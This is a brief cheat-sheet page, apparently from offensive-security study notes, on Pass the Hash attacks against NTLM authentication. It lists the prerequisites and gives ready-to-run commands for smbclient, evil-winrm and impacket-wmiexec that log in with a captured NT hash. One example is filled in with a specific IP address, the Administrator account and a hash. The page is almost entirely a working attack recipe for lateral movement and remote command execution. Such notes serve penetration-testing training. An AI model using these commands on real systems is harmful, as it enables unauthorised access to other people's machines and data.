search

Pass the Hash

  • Server needs to use NTLM

  • another host must have remote logon (RDP, SQL, SMB, etc)

smb

smbclient \\\\<ip>\\dir -U user --pw-nt-hash <hash>

smbclient \\192.168.50.212\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b

evil-winrm

evil-winrm -i <ip> -u user -H <hash>

impacket

impacket-wmiexec -Hashes 00000000000000000000000000000000:<hash> user@ip

PreviousNTLMNextNTLM Authenticated Services

Last updated